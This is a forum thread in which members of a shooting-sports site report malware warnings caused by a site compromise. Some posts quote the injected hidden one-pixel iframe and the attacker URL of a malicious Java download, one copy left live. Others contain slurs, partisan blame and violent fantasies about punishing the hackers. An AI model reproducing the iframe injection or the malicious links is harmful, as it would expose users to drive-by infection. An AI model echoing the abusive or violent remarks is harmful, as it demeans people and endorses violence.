• Watch Out for Scammers!

We've now added a color code for all accounts. Orange accounts are new members, Blue are full members, and Green are Supporters. If you get a message about a sale from an orange account, make sure you pay attention before sending any money!

Malware warning from google conerning Snipers Hide

Re: Malware warning from google conerning Snipers Hide

I get the same thing when accessing the Hide from Google Chrome but no warning with Explorer.

Ya, me too. My kaspersky gives me three warnings when the page loads.

Not sure if this helps at all, I'm not an IT guy

Kasperskywarn.jpg

I use firefox and Symantec has been giving me a java download warning and disabling a certain IP's access? Been happening the last day or so....

I get the same warning with internet explorer & symantec.

web attack: malicious java download 3
attacker URL: wow.incgamers.com/w/ml.jar
source address 89.107.69.70, 80

Same with yahoo.

got these kinds of warnings when visiting snipercentral also. they are going after r gun sites.

I am getting the same with Chrome started for me about 3am this morning......(couldn't sleep) I didn't have it last night but I do today

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: ogonzalez13</div><div class="ubbcode-body">got these kinds of warnings when visiting snipercentral also. they are going after r gun sites. </div></div>

I wonder if that's it- some liberal messing with them. I got the warning too. Not sure how serious it is.

Got the same this morning with Chrome plus a tab at the top of the page to install a plug in? Seems to have gone now.

Google appears to be doing some evil here...

SH1.jpg
SH2.jpg
SH3.jpg

Seems like the site has been compromised and a Java exploit trying to download a trojan. I suggest everyone to turn off Java in their browser, and also turn off javascript (without javascript you wont be able to use the web chat or use the submit reply/quick reply).

The link is located in the source code, at the end:

(DO NOT, UNDER ANY CIRCUMSTANCE ACCESS THIS LINK)

iframe src=hxxp://wow.incgxxers.com/w/wiki.html width=1 height=1></iframe>

Google is saving lots of people... until they remove the exploit.

Same warning with firefox today.

Same with Firefox here.

It is inside the HTML code near the bottom:

"</table></div><iframe src=http://wow.incgamers.com/w/wiki.html width=1 height=1></iframe>"

Hope this helps, but why is a World of Warcraft web page on SnipersHide?

Yeah I just got the same warning.

Same with Firefox here. Nothing last night but its present today.

No warnings on the Blackberry though.

Yesterday my AVG went nuts about a trojan here on the Hide; I posted it on the Facebook page and Lowlight said they took care of it yesterday afternoon.

This morning tried to log on and got the exact same warning pages using Win7Pro/Firefox 8.0 as dbsinh20. I did click ignore (since AVG was catching everything yesterday) and haven't thus far gotten any warnings.

Just got the same warnings myself. I was going to post some screen shots of it but I see it has already been done.

It's the fucking liberals that own the search engines! Just like the bitches that own E-gay and pay-pussy. They're crybabies that think that guns kill people.

End of rant...

PS: I use an iPad and haven't seen any warnings... Yet.

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: oneshot onekill</div><div class="ubbcode-body">It's the fucking liberals that own the search engines! Just like the bitches that own E-gay and pay-pussy. They're crybabies that think that guns kill people.

End of rant...

PS: I use an iPad and haven't seen any warnings... Yet. </div></div>

Uh, you realize that Google, yahoo, etc are PUBLICLY TRADED, right?
Even so, the warning is legit.

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: jtb33</div><div class="ubbcode-body"><div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: oneshot onekill</div><div class="ubbcode-body">It's the fucking liberals that own the search engines! Just like the bitches that own E-gay and pay-pussy. They're crybabies that think that guns kill people.

End of rant...

PS: I use an iPad and haven't seen any warnings... Yet. </div></div>

Uh, you realize that Google, yahoo, etc are PUBLICLY TRADED, right?
Even so, the warning is legit. </div></div>
Uh, of course, but why would that make a difference? What makes you think "publicly Traded" companies can't have liberals running them? Just because a company is publicly traded and therefore technically owned by the public doesn't mean the management gives a shit what the stockholders think.
I guess I should have worded my original post differently to say "The fucking liberals that <span style="font-style: italic">RUN</span> the search engines"... My bad.

yep, My Norton Antivirus stopped 2 attacks coming from this site.

web attack: malicious java download 3
attacker URL: wow.incgamers.com/w/ml.jar

if you don't have an AV, you are probably already infected.

I'm still getting the warning everytime I try to visit so I'm thinking the issue hasn't been entirely taken care of.
confused.gif

I get the Google warning every time I come to the site (after leaving it), but not an AVG warning.

Yesterday morning, when visiting the Hide, I got a warning from micro-trend saying it was a Trojan virus, and it eliminated it from my computer. Nothing today so far.

We need a secret Govt/Mil unit that goes out and firebombs the house's of the people who create these virus programs.

interesting, I'm going to throw up a VM in my DMZ and load some port sniffing tools on it and see what happens.

im getting same message from google chrome.

Have been getting similar warning messages today if I entered SH via a google search. No problems when I access SH via a link in my favorites through Explorer......?

Some one has been in and out since yesterday, the server is aware and are taking steps to remove, but the group is hitting it every 30 minutes since yesterday morning.

It's handled just don't install anything if you hit the gap.

I am on explorer and have Norton on, and nothing popped up about a malicious virus or java download.

I while back i would have blamed the Chinese, but these days i suspect Attorney General Holder, or at least his underlings who naturally told him nothing about what they are doing, as usual, according to him, again.

I dream of the day when folks that do this kind of crap can be easily tracked down so they can be..."contained".

I had the B.S. this morning with my mac. Used my phone instead, no trouble there. I didn't even try to log into on the Mac.

They must have fixed something because Just logging on now and I didn't get the malware notice.....that was the first time in out of about 5 times today that I didn't

Just some asshole with a short dick trying to prove he really isn't worthless.

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: rjdriver</div><div class="ubbcode-body">They must have fixed something because Just logging on now and I didn't get the malware notice.....that was the first time in out of about 5 times today that I didn't </div></div>

+1 working fine now.

it always seems to be when the ads load in the left side of the screen.

Thanks for the update. looks to be good from here as well

grin.gif

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: Mac the knife</div><div class="ubbcode-body">I dream of the day when folks that do this kind of crap can be easily tracked down so they can be..."contained". </div></div>

If you haven't already, check out Mark Bowden's new book: WORM

Interesting read on the subject.

Good luck

This is another good reason to keep your Java updated with recent versions that fix old exploits - this particular exploit, for example, won't run on current versions of Java. You can download an update at:

www.java.com

Nothing wrong with the "liberal" search engine companies, as the site was legitimately hacked/linked a known java exploit and the warning may well have prevented harm to many hide members' computers.

I havent had any problems.... I use explorer with lxquick search engine. lxquick doesnt keep track of what you are searching for...get rid of google..

I just spent three days fighting this fucking re-direct Trojan virus...

<div class="ubbcode-block"><div class="ubbcode-header">Originally Posted By: Mac the knife</div><div class="ubbcode-body">I dream of the day when folks that do this kind of crap can be easily tracked down so they can be..."contained".</div></div>

I have a better idea for them.
Something along the lines of a large bench vise.
You folks can draw your own conclusion.